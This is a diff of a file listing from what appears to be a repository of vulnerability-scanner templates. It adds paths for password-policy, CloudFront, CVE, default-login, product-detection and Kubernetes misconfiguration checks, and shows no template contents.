./poc/auth/iam-key-rotation-90days.yaml ./poc/auth/iam-password-policy.yaml @@ -3806,12 +3813,14 @@ ./poc/auth/limit-login-attempts-reloaded-bf2055665c7948e55efebc0ff947d42e.yaml ./poc/auth/limit-login-attempts-reloaded.yaml ./poc/auth/limit-login-attempts.yaml +./poc/auth/limit-maximum-authentication-attempts.yaml ./poc/auth/linksys-wifi-login-8644.yaml ./poc/auth/linksys-wifi-login.yaml ./poc/auth/list-all-posts-by-authors-nested-categories-and-titles-b42b05f52515fe0313f046f50f84548f.yaml ./poc/auth/list-all-posts-by-authors-nested-categories-and-titles.yaml ./poc/auth/livezilla-login-panel-8649.yaml ./poc/auth/livezilla-login-panel.yaml +./poc/auth/lm-ntlmv1-authentication-enabled.yaml ./poc/auth/login-and-logout-redirect-2e880a42c739bd0db4dee779aa6991dc.yaml ./poc/auth/login-and-logout-redirect.yaml ./poc/auth/login-as-customer-or-user-03ea6c59de756aa7b3e89fdd00bd1462.yaml @@ -4002,6 +4011,7 @@ ./poc/auth/mapbox-token.yaml ./poc/auth/mastodon-chaossocial.yaml ./poc/auth/matomo-login-portal.yaml +./poc/auth/max-password-age-too-high.yaml ./poc/auth/meks-smart-author-widget-492e8c704a973b304ed3684194f95cff.yaml ./poc/auth/meks-smart-author-widget-d7cf08d050d4d9c295d6307e65c1ae52.yaml ./poc/auth/meks-smart-author-widget.yaml @@ -4021,6 +4031,7 @@ ./poc/auth/microsoft-exchange-login.yaml ./poc/auth/mikrotik-routeros-login-page.yaml ./poc/auth/milesightvpn-etc-passwd-fileread.yaml +./poc/auth/minimum-password-age-zero.yaml ./poc/auth/minio-default-login(1).yaml ./poc/auth/minio-default-login-1.yaml ./poc/auth/minio-default-login-2.yaml @@ -4277,6 +4288,7 @@ ./poc/auth/nuget-api-key.yaml ./poc/auth/nuget-key.yaml ./poc/auth/null-auth-header-auth-bypass.yaml +./poc/auth/null-session-allowed.yaml ./poc/auth/nutanix-web-console-login-9159.yaml ./poc/auth/nutanix-web-console-login.yaml ./poc/auth/nuuno-network-login-9160.yaml @@ -4446,6 +4458,8 @@ ./poc/auth/panos-default-login-9457.yaml ./poc/auth/panos-default-login.yaml ./poc/auth/papercut-missing-auth.yaml +./poc/auth/password-complexity-disabled.yaml +./poc/auth/password-history-size-low.yaml ./poc/auth/password-policy-not-set.yaml ./poc/auth/password-policy.yaml ./poc/auth/password-protect-page-63e80b207008e79b35561b6e37e9e086.yaml @@ -4457,6 +4471,7 @@ ./poc/auth/password-protected-woo-store-d46bc741249c3ca579d0cc8e1ede0263.yaml ./poc/auth/password-protected-woo-store.yaml ./poc/auth/password-protected.yaml +./poc/auth/password-reset-lock-screen-enabled.yaml ./poc/auth/passwordless-login-bcabcbcc36aef853d2316088d557e166.yaml ./poc/auth/passwordless-login.yaml ./poc/auth/passwords-manager-c109913f2f0a98614e2ea241b16f6738.yaml @@ -4540,6 +4555,7 @@ ./poc/auth/pinpoint-unauth-9589.yaml ./poc/auth/pinpoint-unauth-9590.yaml ./poc/auth/pinpoint-unauth.yaml +./poc/auth/plaintext-passwords-in-memory.yaml ./poc/auth/plainview-protect-passwords-64631f7e755eb94d7c99500d0510ac42.yaml ./poc/auth/plainview-protect-passwords-79caa4f8ea1fa3260f686401ac5493b5.yaml ./poc/auth/plainview-protect-passwords.yaml @@ -4831,13 +4847,18 @@ ./poc/auth/secnet-ac-default-login.yaml ./poc/auth/secnet-ac-default-password.yaml ./poc/auth/secnet-ac-default-password.yml +./poc/auth/secret-manager-inuse.yaml ./poc/auth/secret-patterns-db.yaml +./poc/auth/secret-rotation-enabled.yaml +./poc/auth/secret-rotation-interval.yaml ./poc/auth/secret-token-rb.yaml ./poc/auth/secret.yaml ./poc/auth/secrets(1).yaml ./poc/auth/secrets-file.yaml ./poc/auth/secrets-in-files-more.yaml ./poc/auth/secrets-in-files.yaml +./poc/auth/secrets-patterns-pii.yaml +./poc/auth/secrets-patterns-rules.yaml ./poc/auth/secsslvpn-auth-bypass.yaml ./poc/auth/secure-ip-logins-6477bf18cad6c823db485408d49b337b.yaml ./poc/auth/secure-ip-logins-ff9293ba28748efa2ab9a2fe77385468.yaml @@ -5169,6 +5190,7 @@ ./poc/auth/ssh-authorized-keys-2.yaml ./poc/auth/ssh-authorized-keys.yaml ./poc/auth/ssh-default-logins.yaml +./poc/auth/ssh-key-auth-required.yaml ./poc/auth/ssh-password-auth.yaml ./poc/auth/ssh-weak-public-key.yaml ./poc/auth/ssh-weakkey-exchange-algo.yaml @@ -5622,6 +5644,7 @@ ./poc/auth/webtoffee-gdpr-cookie-consent-06912f51d2ec918f28076a7a3b043da3.yaml ./poc/auth/webtoffee-gdpr-cookie-consent-4716e5623abe0c03013093fe5dad8deb.yaml ./poc/auth/webtoffee-gdpr-cookie-consent.yaml +./poc/auth/webui-login.yaml ./poc/auth/wechat-social-login-2479cb4475d9844014f0ac9a888921a0.yaml ./poc/auth/wechat-social-login-935a5afdfd89c0c9b17e0f4778ac20b8.yaml ./poc/auth/wechat-social-login.yaml @@ -6316,7 +6339,17 @@ ./poc/aws/clearfy-ec9e3086bbcfcc850fb5fbec286cfaef.yaml ./poc/aws/cloud-enum-aws-app.yaml ./poc/aws/cloud-enum-aws-s3-bucket.yaml +./poc/aws/cloudfront-compress-object.yaml +./poc/aws/cloudfront-custom-certificates.yaml +./poc/aws/cloudfront-geo-restriction.yaml +./poc/aws/cloudfront-insecure-protocol.yaml +./poc/aws/cloudfront-integrated-waf.yaml +./poc/aws/cloudfront-logging-disabled.yaml ./poc/aws/cloudfront-logging-not-enabled.yaml +./poc/aws/cloudfront-origin-shield.yaml +./poc/aws/cloudfront-security-policy.yaml +./poc/aws/cloudfront-traffic-unencrypted.yaml +./poc/aws/cloudfront-viewer-policy.yaml ./poc/aws/cloudtrail-s3-bucket-logging.yaml ./poc/aws/cm-download-manager-e3b297c6bec277185667d6c49219a581.yaml ./poc/aws/cnpj-receitaws.yaml @@ -7589,6 +7622,7 @@ ./poc/config/detect-drone-config-6973.yaml ./poc/config/detect-drone-config.yaml ./poc/config/development-config-file.yaml +./poc/config/device-guard-not-configured.yaml ./poc/config/discuz-config-global.yaml ./poc/config/discuz-info-config_ucenter.yaml ./poc/config/dlink-config-dump.yaml @@ -7744,6 +7778,7 @@ ./poc/config/joomla-config-file.yaml ./poc/config/joomla-sensitive-config.yaml ./poc/config/jsconfig-json.yaml +./poc/config/k8s-liveness-probe-not-configured.yaml ./poc/config/kafka-misconfig.yaml ./poc/config/karma-config-js.yaml ./poc/config/keycloak-openid-config-1.yaml @@ -9495,6 +9530,7 @@ ./poc/cve/CVE-2013-7482.yaml ./poc/cve/CVE-2013-7483-a508557471007a6155b8898d7a35231b.yaml ./poc/cve/CVE-2013-7483.yaml +./poc/cve/CVE-2014-0160.yaml ./poc/cve/CVE-2014-0165-dacd68e72d419d2e7af988604017dd45.yaml ./poc/cve/CVE-2014-0165.yaml ./poc/cve/CVE-2014-0166-32db846280cddec9240e4d78df71ba91.yaml @@ -11838,6 +11874,7 @@ ./poc/cve/CVE-2016-7981.yaml ./poc/cve/CVE-2016-8527.yaml ./poc/cve/CVE-2016-8706.yaml +./poc/cve/CVE-2016-8735.yaml ./poc/cve/CVE-2016-9263-27497d8965222c35f38108456e98b280.yaml ./poc/cve/CVE-2016-9263.yaml ./poc/cve/CVE-2017-0929 (copy 1).yaml @@ -12593,6 +12630,7 @@ ./poc/cve/CVE-2017-7391 2.yaml ./poc/cve/CVE-2017-7391.yaml ./poc/cve/CVE-2017-7504.yaml +./poc/cve/CVE-2017-7525.yaml ./poc/cve/CVE-2017-7529 (copy 1).yaml ./poc/cve/CVE-2017-7529 (copy 2).yaml ./poc/cve/CVE-2017-7529.yaml @@ -13472,6 +13510,7 @@ ./poc/cve/CVE-2019-1000003.yaml ./poc/cve/CVE-2019-1000031-f656c9c371b934dab79fd66b3ba056e1.yaml ./poc/cve/CVE-2019-1000031.yaml +./poc/cve/CVE-2019-1003000.yaml ./poc/cve/CVE-2019-10068.yaml ./poc/cve/CVE-2019-10092.yaml ./poc/cve/CVE-2019-10098.yaml @@ -14747,6 +14786,7 @@ ./poc/cve/CVE-2020-15568.yaml ./poc/cve/CVE-2020-15867.yaml ./poc/cve/CVE-2020-15895.yaml +./poc/cve/CVE-2020-15906.yaml ./poc/cve/CVE-2020-15920 2.yaml ./poc/cve/CVE-2020-15920.yaml ./poc/cve/CVE-2020-16139.yaml @@ -26214,6 +26254,7 @@ ./poc/cve/CVE-2023-2719-c6d2b209c751b9afed030c487a1053cd.yaml ./poc/cve/CVE-2023-2719.yaml ./poc/cve/CVE-2023-27292.yaml +./poc/cve/CVE-2023-27294.yaml ./poc/cve/CVE-2023-2732-1192c1008e256cc793053ef1534c110b.yaml ./poc/cve/CVE-2023-2732.yaml ./poc/cve/CVE-2023-2733-3e8539ba6be575414c880795d33a1311.yaml @@ -27572,6 +27613,7 @@ ./poc/cve/CVE-2023-33510.yaml ./poc/cve/CVE-2023-3352-e547bc065a9e8e423ec5687380a9d7b7.yaml ./poc/cve/CVE-2023-3352.yaml +./poc/cve/CVE-2023-33533.yaml ./poc/cve/CVE-2023-3356-c179e9a218f6a000761e510d823604f0.yaml ./poc/cve/CVE-2023-3356.yaml ./poc/cve/CVE-2023-33568.yaml @@ -27837,6 +27879,7 @@ ./poc/cve/CVE-2023-34960.yaml ./poc/cve/CVE-2023-3499-9897b56ea22d520b31450d796e22df9e.yaml ./poc/cve/CVE-2023-3499.yaml +./poc/cve/CVE-2023-34992.yaml ./poc/cve/CVE-2023-34993.yaml ./poc/cve/CVE-2023-3501-6cebf07395b821e8b68c36b299d5c073.yaml ./poc/cve/CVE-2023-3501.yaml @@ -29116,6 +29159,7 @@ ./poc/cve/CVE-2023-43374.yaml ./poc/cve/CVE-2023-43493-920de2979a038b00f4e4229f01d4cd36.yaml ./poc/cve/CVE-2023-43493.yaml +./poc/cve/CVE-2023-43494.yaml ./poc/cve/CVE-2023-43610-eb331965639b809109667e1ad984ee35.yaml ./poc/cve/CVE-2023-43610.yaml ./poc/cve/CVE-2023-4372-28aa0f5bbbf164a61e41abe5322aa8e0.yaml @@ -29739,6 +29783,7 @@ ./poc/cve/CVE-2023-46211.yaml ./poc/cve/CVE-2023-46212-e0278105da7e504a738397a4f6b902e8.yaml ./poc/cve/CVE-2023-46212.yaml +./poc/cve/CVE-2023-46214.yaml ./poc/cve/CVE-2023-4626-049c396772f6b6c012ec854e7c8950cd.yaml ./poc/cve/CVE-2023-4626.yaml ./poc/cve/CVE-2023-4627-1d8ce7eabd5704c22a11f62afb96f7bf.yaml @@ -30966,6 +31011,7 @@ ./poc/cve/CVE-2023-49778-9ad8823aac101e96019f9c9514ad6aaa.yaml ./poc/cve/CVE-2023-49778.yaml ./poc/cve/CVE-2023-49785.yaml +./poc/cve/CVE-2023-49799.yaml ./poc/cve/CVE-2023-49812-77c423f132f313cb4ce0f37b2bc1e8e8.yaml ./poc/cve/CVE-2023-49812.yaml ./poc/cve/CVE-2023-49813-be0afb8d4ae505f4a57ae920c9c590a8.yaml @@ -33549,10 +33595,12 @@ ./poc/cve/CVE-2024-0984-71d91175d296ca328f8e62ec29060567.yaml ./poc/cve/CVE-2024-0984.yaml ./poc/cve/CVE-2024-0986.yaml +./poc/cve/CVE-2024-10000-694d94278b136ae533a9c85fde05b877.yaml ./poc/cve/CVE-2024-10002-71345796cb4129b3fb6d852524945f8d.yaml ./poc/cve/CVE-2024-10002.yaml ./poc/cve/CVE-2024-10003-80927643a11133e8ee1977195d97aaa0.yaml ./poc/cve/CVE-2024-10003.yaml +./poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml ./poc/cve/CVE-2024-10011-eefe8c0c540af6a79376e37c4cbbfad9.yaml ./poc/cve/CVE-2024-10011.yaml ./poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml @@ -33563,6 +33611,7 @@ ./poc/cve/CVE-2024-10040.yaml ./poc/cve/CVE-2024-10045-b4e327038c9d97f0951cbe31ae85ae95.yaml ./poc/cve/CVE-2024-10045.yaml +./poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml ./poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml ./poc/cve/CVE-2024-10049.yaml ./poc/cve/CVE-2024-10050-5934ca333400ff14e6c956e88c6fcdd7.yaml @@ -33593,11 +33642,19 @@ ./poc/cve/CVE-2024-10176.yaml ./poc/cve/CVE-2024-10180-cda9906f3b0afcef720a2edb145ba669.yaml ./poc/cve/CVE-2024-10180.yaml +./poc/cve/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml +./poc/cve/CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35.yaml +./poc/cve/CVE-2024-10185-8035ec074be079e96120312271a0f33c.yaml ./poc/cve/CVE-2024-10189-c70ac469531f5752b3a747a22314dda8.yaml ./poc/cve/CVE-2024-10189.yaml ./poc/cve/CVE-2024-1021.yaml +./poc/cve/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml +./poc/cve/CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582.yaml +./poc/cve/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml ./poc/cve/CVE-2024-10250-381303a6df453508271ce4a14d6f5e15.yaml ./poc/cve/CVE-2024-10250.yaml +./poc/cve/CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml +./poc/cve/CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48.yaml ./poc/cve/CVE-2024-10341-f9f2b1daeef7d31a7252cb1ebc44b526.yaml ./poc/cve/CVE-2024-10341.yaml ./poc/cve/CVE-2024-10342-4c9fa17231c31987f79d558b7b883e9d.yaml @@ -33606,6 +33663,7 @@ ./poc/cve/CVE-2024-10343.yaml ./poc/cve/CVE-2024-10357-4f61676917f036bdaefc6591bc3b8254.yaml ./poc/cve/CVE-2024-10357.yaml +./poc/cve/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml ./poc/cve/CVE-2024-1037-b7f7f3d961a0c33ea429c4b0e05a6902.yaml ./poc/cve/CVE-2024-1037.yaml ./poc/cve/CVE-2024-10374-0f08cd74cdc8b699792d2afd2c3f92eb.yaml @@ -33620,6 +33678,8 @@ ./poc/cve/CVE-2024-1042.yaml ./poc/cve/CVE-2024-1043-aee5ea7086ed40618487df73181f660f.yaml ./poc/cve/CVE-2024-1043.yaml +./poc/cve/CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml +./poc/cve/CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062.yaml ./poc/cve/CVE-2024-1044-5720ea5d7eef8537b26bc9836c2599a3.yaml ./poc/cve/CVE-2024-1044.yaml ./poc/cve/CVE-2024-1046-bfec7425f9f443824c4a93511a98dbc5.yaml @@ -34738,6 +34798,7 @@ ./poc/cve/CVE-2024-2143.yaml ./poc/cve/CVE-2024-2144-23500ffb45bc67090c3825cea30b2db5.yaml ./poc/cve/CVE-2024-2144.yaml +./poc/cve/CVE-2024-21520.yaml ./poc/cve/CVE-2024-2159-f92ee339e92c436f54a3a32d187db5ba.yaml ./poc/cve/CVE-2024-2159.yaml ./poc/cve/CVE-2024-2163-4c370188065655705ee7ef45c88385e0.yaml @@ -34805,6 +34866,7 @@ ./poc/cve/CVE-2024-2203.yaml ./poc/cve/CVE-2024-2210-63c25c0622f9f4baebf3c98786c78ec1.yaml ./poc/cve/CVE-2024-2210.yaml +./poc/cve/CVE-2024-22120.yaml ./poc/cve/CVE-2024-22134-0acb90c8af594860c66b93b71ce65fe0.yaml ./poc/cve/CVE-2024-22134.yaml ./poc/cve/CVE-2024-22135-aa0536d89ba0db70524ad0dec0d6fe8c.yaml @@ -35020,6 +35082,7 @@ ./poc/cve/CVE-2024-2309.yaml ./poc/cve/CVE-2024-2310-f1a051387d326ffbf4a8bb2e1cf980c8.yaml ./poc/cve/CVE-2024-2310.yaml +./poc/cve/CVE-2024-23108.yaml ./poc/cve/CVE-2024-2311-8a2efd05b62f87d9bf191435ccdadf6e.yaml ./poc/cve/CVE-2024-2311.yaml ./poc/cve/CVE-2024-23163.yaml @@ -35605,6 +35668,7 @@ ./poc/cve/CVE-2024-2697.yaml ./poc/cve/CVE-2024-2702-b7e962ff6e19e83f5be875df87658aad.yaml ./poc/cve/CVE-2024-2702.yaml +./poc/cve/CVE-2024-27130.yaml ./poc/cve/CVE-2024-27188-3e80b51dbae0f0fd95da022c1fdc71f5.yaml ./poc/cve/CVE-2024-27188.yaml ./poc/cve/CVE-2024-27189-3844f0df4850abbe5c839cb4b3d1040a.yaml @@ -35986,6 +36050,7 @@ ./poc/cve/CVE-2024-2926-892849f844a467f063df1469e5698973.yaml ./poc/cve/CVE-2024-2926.yaml ./poc/cve/CVE-2024-29269.yaml +./poc/cve/CVE-2024-2928.yaml ./poc/cve/CVE-2024-2931-a31fc7075076c46049041132f7d5d46b.yaml ./poc/cve/CVE-2024-2931.yaml ./poc/cve/CVE-2024-2933-fbe9282a58927d219d35b2a53a6d63ec.yaml @@ -37816,6 +37881,7 @@ ./poc/cve/CVE-2024-3285.yaml ./poc/cve/CVE-2024-3287-c2144da6501714797b373f946b96b12c.yaml ./poc/cve/CVE-2024-3287.yaml +./poc/cve/CVE-2024-32877.yaml ./poc/cve/CVE-2024-3288-9ec9083e38db99ab2459930f55e51dbf.yaml ./poc/cve/CVE-2024-3288.yaml ./poc/cve/CVE-2024-3293-efd5845dfba55ed7ef2574fca4ab1fae.yaml @@ -39837,6 +39903,7 @@ ./poc/cve/CVE-2024-3849-b86fbef037590625861860408256662a.yaml ./poc/cve/CVE-2024-3849.yaml ./poc/cve/CVE-2024-38526.yaml +./poc/cve/CVE-2024-38653.yaml ./poc/cve/CVE-2024-3866-e32bf1790a0b5f93eed203718c8de990.yaml ./poc/cve/CVE-2024-3866.yaml ./poc/cve/CVE-2024-38669-b4988e1b98a7059d494d71f1c179f27a.yaml @@ -40479,6 +40546,7 @@ ./poc/cve/CVE-2024-4144.yaml ./poc/cve/CVE-2024-4145-ac8aebc5910c825cd0d214f834ad16af.yaml ./poc/cve/CVE-2024-4145.yaml +./poc/cve/CVE-2024-41468.yaml ./poc/cve/CVE-2024-4149-ff377d3eb5955cb9dcb922a0b0fa7658.yaml ./poc/cve/CVE-2024-4149.yaml ./poc/cve/CVE-2024-4150-a9e4da102d6fbbdeb4d95a9a6fab344e.yaml @@ -40553,6 +40621,7 @@ ./poc/cve/CVE-2024-4261.yaml ./poc/cve/CVE-2024-4262-35ce47cb98788e7bedffde4793c9deae.yaml ./poc/cve/CVE-2024-4262.yaml +./poc/cve/CVE-2024-42640.yaml ./poc/cve/CVE-2024-4265-653f92e9a55f8b2a4a38c4fb5a73a93a.yaml ./poc/cve/CVE-2024-4265.yaml ./poc/cve/CVE-2024-4266-db7dff2b364b7e2268ddf30699e03480.yaml @@ -40707,6 +40776,7 @@ ./poc/cve/CVE-2024-4319-34769eeaef5d684df8029c20a81cb8f8.yaml ./poc/cve/CVE-2024-4319-c5a4e1b355a0a92313a0c79292c263f8.yaml ./poc/cve/CVE-2024-4319.yaml +./poc/cve/CVE-2024-4320.yaml ./poc/cve/CVE-2024-43207-79ab794490ce05c7a0a2b8eea3009a07.yaml ./poc/cve/CVE-2024-43207.yaml ./poc/cve/CVE-2024-43208-9a0145ee5d9d9695e7c9d06cea33925d.yaml @@ -41394,6 +41464,7 @@ ./poc/cve/CVE-2024-44045.yaml ./poc/cve/CVE-2024-44046-328792fa07f634dddb2bbb641f64fff7.yaml ./poc/cve/CVE-2024-44046.yaml +./poc/cve/CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9.yaml ./poc/cve/CVE-2024-44047-ddedb021668141a7944db5384dc3c3d1.yaml ./poc/cve/CVE-2024-44047.yaml ./poc/cve/CVE-2024-44048-82a2490270a7c5a6192cdf887ad2c8fb.yaml @@ -41555,6 +41626,7 @@ ./poc/cve/CVE-2024-45293.yaml ./poc/cve/CVE-2024-4530-9a40def000de87d4be3ea01c097a6a90.yaml ./poc/cve/CVE-2024-4530.yaml +./poc/cve/CVE-2024-45309.yaml ./poc/cve/CVE-2024-4531-99317c4a9b9d092195921ece3a2310ea.yaml ./poc/cve/CVE-2024-4531.yaml ./poc/cve/CVE-2024-4532-babdc5829ad7d6c3dddb2e098b147720.yaml @@ -42104,6 +42176,7 @@ ./poc/cve/CVE-2024-4836.yaml ./poc/cve/CVE-2024-4838-438709c75b9635eea017b97243965ed2.yaml ./poc/cve/CVE-2024-4838.yaml +./poc/cve/CVE-2024-4841.yaml ./poc/cve/CVE-2024-4845-2662a05740af1e44cbe70ff5fcf32342.yaml ./poc/cve/CVE-2024-4845.yaml ./poc/cve/CVE-2024-4847-2e47b9f9d6dcb1afa3ee1ae23a82fc46.yaml @@ -42716,6 +42789,7 @@ ./poc/cve/CVE-2024-5331.yaml ./poc/cve/CVE-2024-5332-dff81043d580763d7a82f64d3036696f.yaml ./poc/cve/CVE-2024-5332.yaml +./poc/cve/CVE-2024-5334.yaml ./poc/cve/CVE-2024-5335-f0e30cc08b0a4a188e47c1c50b01d31d.yaml ./poc/cve/CVE-2024-5335.yaml ./poc/cve/CVE-2024-5341-968a2fd7f4ceccb41ecca593b7cab646.yaml @@ -43181,6 +43255,7 @@ ./poc/cve/CVE-2024-6028.yaml ./poc/cve/CVE-2024-6033-9197717be97915089a2b9b5c78c3673f.yaml ./poc/cve/CVE-2024-6033.yaml +./poc/cve/CVE-2024-6049.yaml ./poc/cve/CVE-2024-6054-5423963993c6e57bd26bb8f5ebae154a.yaml ./poc/cve/CVE-2024-6054.yaml ./poc/cve/CVE-2024-6069-504e0c7069132aec59344e8b80a745b3.yaml @@ -44122,6 +44197,7 @@ ./poc/cve/CVE-2024-7955.yaml ./poc/cve/CVE-2024-7963-42883078e2295a44c19c2974ad634068.yaml ./poc/cve/CVE-2024-7963.yaml +./poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml ./poc/cve/CVE-2024-8016-d1bc0d8335eb95e44886878c9717595b.yaml ./poc/cve/CVE-2024-8016.yaml ./poc/cve/CVE-2024-8030-4bf23408e0dc80a213e018f362e5999c.yaml @@ -44695,6 +44771,7 @@ ./poc/cve/CVE-2024-9161-7df3ec5d46908dca2a1515693ac69f54.yaml ./poc/cve/CVE-2024-9161.yaml ./poc/cve/CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f.yaml +./poc/cve/CVE-2024-9162.yaml ./poc/cve/CVE-2024-9169-f28b64870e010b6c9a9192d27b27621e.yaml ./poc/cve/CVE-2024-9169.yaml ./poc/cve/CVE-2024-9172-dd6c762e4dc7b5869543b2ed92be27e1.yaml @@ -44769,6 +44846,7 @@ ./poc/cve/CVE-2024-9242.yaml ./poc/cve/CVE-2024-9263-9f819c527e666a0f4e5ffb74898c3f93.yaml ./poc/cve/CVE-2024-9263.yaml +./poc/cve/CVE-2024-9264.yaml ./poc/cve/CVE-2024-9265-6f041754ba39de1f44500ace37c6936a.yaml ./poc/cve/CVE-2024-9265.yaml ./poc/cve/CVE-2024-9267-8893aa1c1ec1b76901d7871f6ed6bfe5.yaml @@ -44830,6 +44908,7 @@ ./poc/cve/CVE-2024-9374.yaml ./poc/cve/CVE-2024-9375-1ada64725f832858cb5e8e8b357262ef.yaml ./poc/cve/CVE-2024-9375.yaml +./poc/cve/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml ./poc/cve/CVE-2024-9377-eb9f54f5139e537cd6a9ac4820541be4.yaml ./poc/cve/CVE-2024-9377.yaml ./poc/cve/CVE-2024-9378-8974a5e92d4cff0ea3c01120fb204b47.yaml @@ -44853,6 +44932,7 @@ ./poc/cve/CVE-2024-9435.yaml ./poc/cve/CVE-2024-9436-72a457058cb05b316cebd946dd84ec21.yaml ./poc/cve/CVE-2024-9436.yaml +./poc/cve/CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml ./poc/cve/CVE-2024-9444-a6b3efa350afce890b47530869028068.yaml ./poc/cve/CVE-2024-9444.yaml ./poc/cve/CVE-2024-9445-0fedc25f3077e00a018f5c725f6ded08.yaml @@ -44880,6 +44960,7 @@ ./poc/cve/CVE-2024-9488.yaml ./poc/cve/CVE-2024-9501-75b9d56a40fe1396bb3b9ef1c7d11ff3.yaml ./poc/cve/CVE-2024-9501.yaml +./poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml ./poc/cve/CVE-2024-9507-698602582a898ef6e8ecf4cbadd940fc.yaml ./poc/cve/CVE-2024-9507.yaml ./poc/cve/CVE-2024-9518-feda24c489ca1e9c4a2da83d340cc3c2.yaml @@ -44968,6 +45049,7 @@ ./poc/cve/CVE-2024-9627.yaml ./poc/cve/CVE-2024-9628-3d855d9a00666119c6c4dc4121ccafb1.yaml ./poc/cve/CVE-2024-9628.yaml +./poc/cve/CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e.yaml ./poc/cve/CVE-2024-9630-0ce85caa78ba4624e2a8716c2971cba8.yaml ./poc/cve/CVE-2024-9630.yaml ./poc/cve/CVE-2024-9634-d865b6fc0ac9d8d7dca8d3f6df89b5a1.yaml @@ -45073,6 +45155,7 @@ ./poc/cve/CVE-2024-9931.yaml ./poc/cve/CVE-2024-9932-7558b83919bdb2cc193ccec87ae1cb78.yaml ./poc/cve/CVE-2024-9932.yaml +./poc/cve/CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352.yaml ./poc/cve/CVE-2024-9933-e1ec60c544c2e28af5a94072e33b5a84.yaml ./poc/cve/CVE-2024-9933.yaml ./poc/cve/CVE-2024-9937-9915217ba7d6f29cd232016898fb9998.yaml @@ -45089,6 +45172,7 @@ ./poc/cve/CVE-2024-9951.yaml ./poc/cve/CVE-2024-9967-588327a449d255859025a57006363402.yaml ./poc/cve/CVE-2024-9967.yaml +./poc/cve/CVE-2024–24142.yaml ./poc/cve/CVE202127562-220331-222408.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml @@ -52478,6 +52562,7 @@ ./poc/cve/cve-2024-23334.yaml ./poc/cve/cve-2024-23897.yaml ./poc/cve/cve-2024-3400.yaml +./poc/cve/cve-2024-6966.yaml ./poc/cve/cve-annotate.yaml ./poc/cve/cve-annotate.yml ./poc/cve/cve202120837-220331-223044.yaml @@ -53167,6 +53252,7 @@ ./poc/default/caprover-default-login.yaml ./poc/default/change-default-login-logo-url-and-title-fef61a56dbdca375b6c1f6da9b2473d7.yaml ./poc/default/change-default-login-logo-url-and-title.yaml +./poc/default/change-default-port.yaml ./poc/default/chinaunicom-default-login-906.yaml ./poc/default/chinaunicom-default-login-907.yaml ./poc/default/chinaunicom-default-login-908.yaml @@ -53577,6 +53663,7 @@ ./poc/default/jupyterhub-default-login-8400.yaml ./poc/default/jupyterhub-default-login-8401.yaml ./poc/default/jupyterhub-default-login.yaml +./poc/default/k8s-default-namespace-used.yaml ./poc/default/kafka-center-default-login-8415.yaml ./poc/default/kafka-center-default-login-8416.yaml ./poc/default/kafka-center-default-login-8417.yaml @@ -54378,6 +54465,7 @@ ./poc/detect/cvsweb-detect.yaml ./poc/detect/cx-cloud-upload-detect-6766.yaml ./poc/detect/cx-cloud-upload-detect.yaml +./poc/detect/cyberpanel-detect.yaml ./poc/detect/darkstat-detect-1.yaml ./poc/detect/darkstat-detect-2.yaml ./poc/detect/darkstat-detect-6767.yaml @@ -54494,6 +54582,7 @@ ./poc/detect/dnssec-detection-7051.yaml ./poc/detect/dnssec-detection.yaml ./poc/detect/docker-api-detection.yaml +./poc/detect/docker-ports-detection.yaml ./poc/detect/dolibarr-detect-7069.yaml ./poc/detect/dolibarr-detect-7070.yaml ./poc/detect/dolibarr-detect-7071.yaml @@ -54598,6 +54687,7 @@ ./poc/detect/firebase-detect-7495.yaml ./poc/detect/firebase-detect-7496.yaml ./poc/detect/firebase-detect.yaml +./poc/detect/flexmls-detect.yaml ./poc/detect/flink-version-detect.yaml ./poc/detect/flir-detect.yaml ./poc/detect/flowci-detection.yaml @@ -54865,6 +54955,7 @@ ./poc/detect/jsf-detection.yaml ./poc/detect/jspxcms-detect.yaml ./poc/detect/jwt-detection.yaml +./poc/detect/kaseya-detect.yaml ./poc/detect/kavita-panel-detect.yaml ./poc/detect/kevinlab-device-detect-1.yaml ./poc/detect/kevinlab-device-detect-2.yaml @@ -54923,6 +55014,7 @@ ./poc/detect/linkerd-ssrf-detect-8640.yaml ./poc/detect/linkerd-ssrf-detect.yaml ./poc/detect/livehelperchat-detect.yaml +./poc/detect/localai-detect.yaml ./poc/detect/log4j-detect.yaml ./poc/detect/log4j-rce-detect-waf-bypass.yaml ./poc/detect/log4jshell-detect.yaml @@ -55195,6 +55287,7 @@ ./poc/detect/pega-detect-9476.yaml ./poc/detect/pega-detect.yaml ./poc/detect/pexip-detect.yaml +./poc/detect/pghero-detect.yaml ./poc/detect/pgsql-detect.yaml ./poc/detect/pgsql-version-detect.yaml ./poc/detect/php-detect.yaml @@ -55931,6 +56024,7 @@ ./poc/docker/docker-hub-login-check.yaml ./poc/docker/docker-k8s.yaml ./poc/docker/docker-misconfigured-api.yaml +./poc/docker/docker-ports-detection.yaml ./poc/docker/docker-publish.yml ./poc/docker/docker-registry-7064.yaml ./poc/docker/docker-registry-7065.yaml @@ -55967,6 +56061,9 @@ ./poc/docker/exposed-docker-api.yaml ./poc/docker/exposed-dockerd.yaml ./poc/docker/flask-redis-docker.yaml +./poc/docker/k8s-containers-share-host-ipc.yaml +./poc/docker/k8s-privileged-container.yaml 